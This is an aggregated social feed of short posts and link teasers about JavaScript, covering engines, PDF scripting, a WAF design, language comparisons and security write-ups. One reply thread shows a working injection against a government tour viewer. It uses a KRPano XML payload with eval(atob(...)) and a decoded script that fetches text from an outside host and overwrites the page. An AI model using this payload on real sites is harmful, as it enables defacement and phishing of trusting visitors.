Micro QuickJS Engine Compiles & Runs JavaScript With As Little As 10kB Of RAM
Very talented open-source developer Fabrice Bellard who already is well known for his work on QEMU, the Tiny C Compiler, and FFmpeg, has another accomplishment: Micro QuickJS. The Micro QuickJS JavaScript engine can compile and run JavaScript programs with as little as 10 kB of RAM… ⌘ Read more
↳
In-reply-to
»
Working on day 3 of the Advent of Code 2025: https://adventofcode.com/
⤋ Read More
@itsericwoodward@itsericwoodward.com So you’re found for Javascript eh? 🧐
@shinyoukai@neko.laidback.moe I’m mostly against it because it forces Javascript™ on the client(s) at a blanket level. Doing “Proof-of-Work” explicitly IMO is fine™, but not at an Ingress/Edge level IMO – Which is why I haven’t adopted it myself.
ProcessOne: Stop Telling Us XMPP Should Use JSON
We hear this too often: “XMPP uses XML. It should use JSON—it’s more modern.”
The logic seems straightforward: JSON came later, so it must be better. But better for what, exactly?
JSON became successful because it’s the standard serialization format for JavaScript. That made it convenient for browser-based applications.
Does that m … ⌘ Read more
How to Identify Sensitive Data in JavaScript Files: (JS-Recon)
A complete guide to uncovering hidden secrets, API keys, and credentials inside JavaScript files
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/h … ⌘ Read more
@arne@uplegger.eu Yeah SSE + HTMX is basically all you need really. The whole complicated/complex JavaScript ecosystem is overkill.
A Beginner’s Guide to Finding Hidden API Endpoints in JavaScript Files
How to discover what others miss in plain sight
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/a-beginners-guide-to-finding-h … ⌘ Read more
** JavaScript Notebook **
Kartik recently reminded me of my own project playground that I do use from time to time, but that I’ve always been a little frustrated with.
That reminder paired with that frustration lead me to revisit something similar that I’d started a while ago, but hadn’t finished. Notebook is kinda my take on Jupyter Notebooks minus a ton of features and capabilities.
Here is … ⌘ Read more
I finally resolved my issues with hashing twts… with REGEX!
Dates in JavaScript are truly strange creatures.
** Answering some questions about Baba Yaga **
My previous post found its way to Hacker News; I don’t have an account there, but a commenter asked a few questions that I thought I could answer in a follow up post.
Baba Yaga uses call-by-value evaluation, not call-by-need (aka“lazy”).
From the interpreter,
”`hljs javascript
function visitFunctionCall(node) {
const callee = visit(node.callee);
// Arguments ar … ⌘ Read more”`
↳
In-reply-to
»
@kat I don’t like Golang much either, but I am not a programmer. This little site, Go by example might explain a thing or two.
⤋ Read More
One of the nicest things about Go is the language itself, comparing Go to other popular languages in terms of the complexity to learn to be proficient in:
- Go:
25keywords (Stack Overflow); CSP-style concurrency (goroutines & channels)
- Python 2:
30keywords (TutorialsPoint); GIL-bound threads & multiprocessing (Wikipedia)
- Python 3:
35keywords (Initial Commit); GIL-bound threads,asyncio& multiprocessing (Wikipedia, DEV Community)
- Java:
50keywords (Stack Overflow); threads +java.util.concurrent(Wikipedia)
- C++:
82keywords (Stack Overflow);std::thread, atomics & futures (en.cppreference.com)
- JavaScript:
38keywords (Stack Overflow); single-threaded event loop &async/await, Web Workers (Wikipedia)
- Ruby:
42keywords (Stack Overflow); GIL-bound threads (MRI), fibers & processes (Wikipedia)
Also spent the morning continuing to think about a new design for EdgeGuard’s WAF. I’m basically going to build an entirely new pluggable WAF that will be designed to only consider Rate Limiting, IP/ASN-based filtering, JavaScript challenge handling, Basic behavioral analysis and Anomaly detection.
The only part of this design I’m not 100% sure about is the Javascript-based challenge handling? 🤔 I’m also considering making this into a “proof of work” requirement too, but I also don’t want to falsely block folks that a) turn Javascript™ off or b) Use a browser like links, elinks or lynx for example.
Hmmm 🧐
️♂️ Unlisted but Not Unseen: How I Found the Admin Panel in a JavaScript Comment
Hey there!😁
[Continue reading on InfoSec Write-ups »](https://infosecwriteu … ⌘ Read more
V8 JavaScript engine gets eager compilation hints, but will devs use sparingly as advised?
Comments ⌘ Read more
** Payloads in Plain Sight: How Open Redirect + JavaScript Led to Full Account Takeover **
Hey there!😁
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/payloads-in-plai … ⌘ Read more
Exposed Secrets in JavaScript Files
🔥Free Article https://medium.com/@Abhijeet_kumawat_/exposed-secrets-in-javascript-files-430a76834952?sk=ffd9ca6c8ede38ac77dcb68a507b9299
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/exposed-secrets-in-javascript-fi … ⌘ Read more
Playing multimedia with Dillo
What if you want to use a web browser like Dillo, which lacks JavaScript support and can’t play audio or video inside the browser? Dillo doesn’t have the capability to play audio or video directly from the browser, however it can easily offload this task to other programs. This page collects some examples of how to do watch videos and listen to audio tracks or podcasts by using an external player program. In particular we will cover mpv with yt-dlp which supports YouTube … ⌘ Read more
i wonder if i could make a little yarn widget for my site to show my last post. that’d be fun. sadly i do not know javascript
Oracle justified its JavaScript trademark with Node.js–now it wants that ignored
Article URL: https://deno.com/blog/deno-v-oracle2
Comments URL: https://news.ycombinator.com/item?id=42939940
Points: 503
# Comments: 129 ⌘ Read more
Run Linux inside a PDF file via a RISC-V emulator
You might expect PDF files to only be comprised of static documents, but surprisingly, the PDF file format supports Javascript with its own separate standard library. Modern browsers (Chromium, Firefox) implement this as part of their PDF engines. However, the APIs that are available in the browser are much more limited. The full specfication for the JS in PDFs was only ever implemented by Adobe Acrobat, and it contains some ridicul … ⌘ Read more
@lyse@lyse.isobeef.org The one in question is more like the javascript version for unwrapping errors when accessing methods.
const value = some?.deeply?.nested?.object?.value
but for handling errors returned by methods. So if you wanted to chain a bunch of function calls together and if any error return immediately. It would be something like this:
b:= SomeAPIWithErrorsInAllCalls()
b.DoThing1() ?
b.DoThing2() ?
// Though its not in the threads I assume one could do like this to chain.
b.Chain1()?.Chain2()?.End()?
I am however infavor of having a sort of ternary ? in go.
PS. @prologic@twtxt.net for some reason this is eating my response without throwing an error :( I assume it has something to do with the CSRF. Can i not have multiple tabs open with yarn?
JavaScript Temporal is coming
Article URL: https://developer.mozilla.org/en-US/blog/javascript-temporal-is-coming/
Comments URL: https://news.ycombinator.com/item?id=42876840
Points: 504
# Comments: 173 ⌘ Read more
Google begins requiring JavaScript for Google Search
Google says it has begun requiring users to turn on JavaScript, the widely used programming language to make web pages interactive, in order to use Google Search. In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the overall Google Search experience for users. The spokesperson noted that, with … ⌘ Read more
↳
In-reply-to
»
Nice! totally legit government page: https://tour.diplomaticrooms.state.gov/?id=0&xml=https://sour.is/awesome.html
⤋ Read More
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
.then(e => e.text())
.then(e => {
document.open(), document.write(e), document.close();
})
.catch(e => {
console.error('Error fetching the user agent:', e);
}) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
Show HN: Tetris in a PDF
I realized that the PDF engines of modern desktop browsers (PDFium and PDF.js) support JavaScript with enough I/O primitives to make a basic game like Tetris.
It was a bit tricky to find a union of features that work in both engines, but in the end it turns out that showing/hiding annotation “fields” works well to make monochrome pixels, and keyboard input can be achieved by typing in a text input box.
All in all it’s quite janky but a nice reminder of how general purpose PDF scripting can be. The lin … ⌘ Read more
morning yarn friends i’ve been playing with astro the SSG and it’s a blast i see why my friends love it and rec it to everyone. i may think javascript was a mistake but this is super cool
Deno v. Oracle: JavaScript Trademark Dispute
Legal action seeks to cancel Oracle’s “JavaScript” trademark, which it renewed fraudulently and has abandoned. ⌘ Read more
↳
In-reply-to
»
(#aznhzra) @doesnm Agree. salty.im should allow the user to post multiple brokers on their webfinger so the client can find a working path.
⤋ Read More
Honestly… not much. Have abandon two projects (both private) on Golang and one related to cryptography. My mostly languages are Python and Javascript (also can PHP). After writing code on Go i spend same time on fixing dumb errors
** A playground for sharing scrappy fiddles **
I shared some snippets of JavaScript in a recent blog post and was wicked irked that I didn’t have an easy way to share interactive code on my own thing…so… I made a totally static JavaScript playground for running little experiments and sharing scrappy fiddles!
It is pretty simple — it allows folks to enter and run JavaScript, includes a console so you can easily log thing … ⌘ Read more
** Constants, variable assignment, and pointers **
After reading my last post, a friend asked an interesting question that I thought would also be fun to write about!
They noted that in the reshape function I declared the variable result as a constant. They asked if this was a mistake? Because I was resigning the value iteratively, shouldn’t it be declared using let?
What is happening there is that the constant is being declared as an array, so the reference … ⌘ Read more
** Reshape, in JavaScript and APL **
In APL the rho, ⍴, called reshape is used to both construct arrays of a given shape (dimensionality), and to reconfigure arrays into new shapes.
Sometimes I wish I had reshape in JavaScript…so I wrote it!
Here are two functions that, when combined, a la Captain Planet, can stand in for APL’s reshape in JavaScript.
Ravel is the simpler of the two, it takes an array of any dimension and ret … ⌘ Read more
Adding the ESLint Tool to an AI Assistant: Improving Recommendations for JS/TS Projects
We show how to enable our AI assistant to provide advice that is both helpful and actionable for linting JavaScript and TypeScript projects. ⌘ Read more
Porting my JavaScript Game Engine to C for No Reason
high_impacttl;dr: high_impact is small game engine for 2D action games. It’s written in C, compiles to Windows, Mac and Linux as well as to WASM for the Web. It’s “inspired by” my original Impact JavaScript game engine from 2010. The name high_impact is a nod to a time when C was considered a high level language.
MIT licensed, source on github: [github.com/phoboslab/high_impact](https://github … ⌘ Read more